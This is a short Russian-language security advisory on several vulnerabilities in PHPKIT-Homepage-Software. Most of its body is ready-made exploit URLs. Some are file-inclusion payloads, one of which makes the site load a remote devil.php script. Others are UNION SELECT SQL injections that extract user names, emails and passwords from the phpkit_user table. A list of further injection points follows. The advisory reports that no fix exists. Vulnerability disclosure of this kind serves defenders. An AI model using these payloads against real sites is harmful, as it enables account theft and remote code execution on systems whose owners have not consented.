Множественные уязвимости в PHPKIT

Описание: Несколько уязвимостей обнаружено в PHPKIT-Homepage-Software. Удаленный атакующий может выполнить произвольный PHP код, выполнить нападение SQL инъекции и раскрыть инсталляционный путь.

Возможен локальный инклуд *.php :

 http://hanter/include.php?path=/home/devil.php

 http://hanter/admin/admin.php?path=http://host/devil.php

 
http://hanter/include.php?path=update_1602.php

http://hanter/include.php?path=comment/comment.php&comcat=gb&subid=1'+UNION+SELECT+null,null,user_email,
user_name,null,null,null,null,user_pw,null,null,null+FROM+phpkit_user+WHERE+user_id='1

http://hanter/include.php?path=login/member.php&order=nick&usernick='+UNION+SELECT+null,null,null,null,null,
null,user_pw,null,null,user_name,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM
+phpkit_user+WHERE+user_name+LIKE+'%

http://hanter/include.php?path=comment/comment.php&subid=1&comcat=gb'+UNION+SELECT+null,null,null,null,
user_name,null,user_pw,null+FROM+phpkit_user+WHERE+user_id='1
 
 +

http://hanter/include.php?path=login/userinfo.php&id='sql-inj
http://hanter/include.php?path=content/overview.php&type=1&letter='sql-inj
http://hanter/include.php?path=forum/showcat.php&catid='sql-inj
http://hanter/include.php?path=login/imcenter.php&userid='sql-inj
http://hanter/include.php?newposttime='sql-inj&path=forum/main.php
http://hanter/include.php?path=forum/showthread.php&threadid=3'sql-inj
http://hanter/include.php?path=login/mailer.php&userid=1'sql-inj
http://hanter/include.php?path=content/download.php&contentid=14'sql-inj

URL производителя:http://www.phpkit.de/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Уязвимость обнаружил Hanter [hanter-xxx-net ять mail.ru].